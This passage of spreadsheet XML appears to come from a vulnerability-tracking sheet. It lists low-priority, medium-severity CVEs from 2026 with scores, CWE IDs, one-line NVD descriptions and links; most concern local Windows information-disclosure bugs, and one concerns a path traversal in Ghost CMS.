      <c r="H4652" s="5" t="inlineStr"/>
      <c r="I4652" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4652" s="5" t="inlineStr"/>
      <c r="K4652" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="L4652" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t>
        </is>
      </c>
    </row>
    <row r="4653">
      <c r="A4653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69453</t>
        </is>
      </c>
      <c r="C4653" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4653" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4653" s="5" t="inlineStr"/>
      <c r="F4653" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4653" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4653" s="5" t="inlineStr"/>
      <c r="I4653" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4653" s="5" t="inlineStr"/>
      <c r="K4653" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4653" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69453</t>
        </is>
      </c>
    </row>
    <row r="4654">
      <c r="A4654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69457</t>
        </is>
      </c>
      <c r="C4654" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4654" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4654" s="5" t="inlineStr"/>
      <c r="F4654" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4654" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4654" s="5" t="inlineStr"/>
      <c r="I4654" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4654" s="5" t="inlineStr"/>
      <c r="K4654" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4654" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t>
        </is>
      </c>
    </row>
    <row r="4655">
      <c r="A4655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69504</t>
        </is>
      </c>
      <c r="C4655" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4655" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4655" s="5" t="inlineStr"/>
      <c r="F4655" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4655" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4655" s="5" t="inlineStr"/>
      <c r="I4655" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4655" s="5" t="inlineStr"/>
      <c r="K4655" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4655" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t>
        </is>
      </c>
    </row>
    <row r="4656">
      <c r="A4656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69527</t>
        </is>
      </c>
      <c r="C4656" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4656" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4656" s="5" t="inlineStr"/>
      <c r="F4656" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4656" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4656" s="5" t="inlineStr"/>
      <c r="I4656" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4656" s="5" t="inlineStr"/>
      <c r="K4656" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4656" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t>
        </is>
      </c>
    </row>
    <row r="4657">
      <c r="A4657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69531</t>
        </is>
      </c>
      <c r="C4657" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4657" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4657" s="5" t="inlineStr"/>
      <c r="F4657" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4657" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4657" s="5" t="inlineStr"/>
      <c r="I4657" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4657" s="5" t="inlineStr"/>
      <c r="K4657" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L4657" s="5" t="inlineStr">
        <is>
          <t>Unintended proxy or intermediary ('confused deputy') in Microsoft Windows Speech allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69531</t>
        </is>
      </c>
    </row>
    <row r="4658">
      <c r="A4658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69554</t>
        </is>
      </c>
      <c r="C4658" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4658" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4658" s="5" t="inlineStr"/>
      <c r="F4658" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4658" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4658" s="5" t="inlineStr"/>
      <c r="I4658" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4658" s="5" t="inlineStr"/>
      <c r="K4658" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4658" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M4658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69554</t>
        </is>
      </c>
    </row>
    <row r="4659">
      <c r="A4659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69568</t>
        </is>
      </c>
      <c r="C4659" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4659" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4659" s="5" t="inlineStr"/>
      <c r="F4659" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4659" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4659" s="5" t="inlineStr"/>
      <c r="I4659" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4659" s="5" t="inlineStr"/>
      <c r="K4659" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4659" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69568</t>
        </is>
      </c>
    </row>
    <row r="4660">
      <c r="A4660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69609</t>
        </is>
      </c>
      <c r="C4660" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4660" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4660" s="5" t="inlineStr"/>
      <c r="F4660" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4660" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4660" s="5" t="inlineStr"/>
      <c r="I4660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4660" s="5" t="inlineStr"/>
      <c r="K4660" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-193</t>
        </is>
      </c>
      <c r="L4660" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t>
        </is>
      </c>
    </row>
    <row r="4661">
      <c r="A4661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69616</t>
        </is>
      </c>
      <c r="C4661" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4661" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4661" s="5" t="inlineStr"/>
      <c r="F4661" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4661" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4661" s="5" t="inlineStr"/>
      <c r="I4661" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4661" s="5" t="inlineStr"/>
      <c r="K4661" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4661" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t>
        </is>
      </c>
    </row>
    <row r="4662">
      <c r="A4662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69618</t>
        </is>
      </c>
      <c r="C4662" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4662" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4662" s="5" t="inlineStr"/>
      <c r="F4662" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4662" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4662" s="5" t="inlineStr"/>
      <c r="I4662" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4662" s="5" t="inlineStr"/>
      <c r="K4662" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4662" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69618</t>
        </is>
      </c>
    </row>
    <row r="4663">
      <c r="A4663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69627</t>
        </is>
      </c>
      <c r="C4663" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4663" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4663" s="5" t="inlineStr"/>
      <c r="F4663" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4663" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4663" s="5" t="inlineStr"/>
      <c r="I4663" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4663" s="5" t="inlineStr"/>
      <c r="K4663" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4663" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t>
        </is>
      </c>
    </row>
    <row r="4664">
      <c r="A4664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69672</t>
        </is>
      </c>
      <c r="C4664" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4664" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4664" s="5" t="inlineStr"/>
      <c r="F4664" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4664" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4664" s="5" t="inlineStr"/>
      <c r="I4664" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4664" s="5" t="inlineStr"/>
      <c r="K4664" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4664" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows DNS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69672</t>
        </is>
      </c>
    </row>
    <row r="4665">
      <c r="A4665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69674</t>
        </is>
      </c>
      <c r="C4665" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4665" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4665" s="5" t="inlineStr"/>
      <c r="F4665" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4665" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4665" s="5" t="inlineStr"/>
      <c r="I4665" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4665" s="5" t="inlineStr"/>
      <c r="K4665" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4665" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Modern Device Management (MDM) allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M4665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69674</t>
        </is>
      </c>
    </row>
    <row r="4666">
      <c r="A4666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69684</t>
        </is>
      </c>
      <c r="C4666" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4666" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4666" s="5" t="inlineStr"/>
      <c r="F4666" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4666" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4666" s="5" t="inlineStr"/>
      <c r="I4666" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4666" s="5" t="inlineStr"/>
      <c r="K4666" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="L4666" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Windows Error Reporting allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69684</t>
        </is>
      </c>
    </row>
    <row r="4667">
      <c r="A4667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69741</t>
        </is>
      </c>
      <c r="C4667" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4667" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4667" s="5" t="inlineStr"/>
      <c r="F4667" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4667" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4667" s="5" t="inlineStr"/>
      <c r="I4667" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4667" s="5" t="inlineStr"/>
      <c r="K4667" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4667" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69741</t>
        </is>
      </c>
    </row>
    <row r="4668">
      <c r="A4668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69770</t>
        </is>
      </c>
      <c r="C4668" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4668" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4668" s="5" t="inlineStr"/>
      <c r="F4668" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4668" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4668" s="5" t="inlineStr"/>
      <c r="I4668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4668" s="5" t="inlineStr"/>
      <c r="K4668" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4668" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69770</t>
        </is>
      </c>
    </row>
    <row r="4669">
      <c r="A4669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69794</t>
        </is>
      </c>
      <c r="C4669" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4669" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4669" s="5" t="inlineStr"/>
      <c r="F4669" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4669" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4669" s="5" t="inlineStr"/>
      <c r="I4669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4669" s="5" t="inlineStr"/>
      <c r="K4669" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L4669" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Encrypting File System (EFS) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69794</t>
        </is>
      </c>
    </row>
    <row r="4670">
      <c r="A4670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69808</t>
        </is>
      </c>
      <c r="C4670" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4670" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4670" s="5" t="inlineStr"/>
      <c r="F4670" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4670" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4670" s="5" t="inlineStr"/>
      <c r="I4670" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4670" s="5" t="inlineStr"/>
      <c r="K4670" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4670" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t>
        </is>
      </c>
    </row>
    <row r="4671">
      <c r="A4671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69862</t>
        </is>
      </c>
      <c r="C4671" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4671" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4671" s="5" t="inlineStr"/>
      <c r="F4671" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G4671" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4671" s="5" t="inlineStr"/>
      <c r="I4671" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4671" s="5" t="inlineStr"/>
      <c r="K4671" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="L4671" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t>
        </is>
      </c>
    </row>
    <row r="4672">
      <c r="A4672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70145</t>
        </is>
      </c>
      <c r="C4672" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4672" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4672" s="5" t="inlineStr"/>
      <c r="F4672" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4672" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H4672" s="5" t="inlineStr"/>
      <c r="I4672" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4672" s="5" t="inlineStr"/>
      <c r="K4672" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4672" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t>
        </is>
      </c>
    </row>
    <row r="4673">
      <c r="A4673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70290</t>
        </is>
      </c>
      <c r="C4673" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4673" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4673" s="5" t="inlineStr"/>
      <c r="F4673" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4673" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4673" s="5" t="inlineStr"/>
      <c r="I4673" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4673" s="5" t="inlineStr"/>
      <c r="K4673" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L4673" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32 Kernel Subsystem allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70290</t>
        </is>
      </c>
    </row>
    <row r="4674">
      <c r="A4674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70592</t>
        </is>
      </c>
      <c r="C4674" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4674" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4674" s="5" t="inlineStr"/>
      <c r="F4674" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4674" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H4674" s="5" t="inlineStr"/>
      <c r="I4674" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J4674" s="5" t="inlineStr"/>
      <c r="K4674" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4674" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 1.20.1 until 6.54.1, an Administrator-level user could remotely overwrite certain files on the filesystem through the database backup filename, leading to integrity and availability issues. The database export endpoint failed to reject path separators in the caller-supplied filename. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M4674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70592</t>
        </is>
      </c>
    </row>
    <row r="4675">
      <c r="A4675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71341</t>
        </is>
      </c>
      <c r="C4675" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4675" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4675" s="5" t="inlineStr"/>
      <c r="F4675" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4675" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4675" s="5" t="inlineStr"/>
      <c r="I4675" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4675" s="5" t="inlineStr"/>
      <c r="K4675" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4675" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Partition Management Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M4675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71341</t>
        </is>
      </c>
    </row>
    <row r="4676">
      <c r="A4676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71441</t>
        </is>
      </c>
      <c r="C4676" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="D4676" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4676" s="5" t="inlineStr"/>
      <c r="F4676" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4676" s="5" t="inlineStr">
        <is>
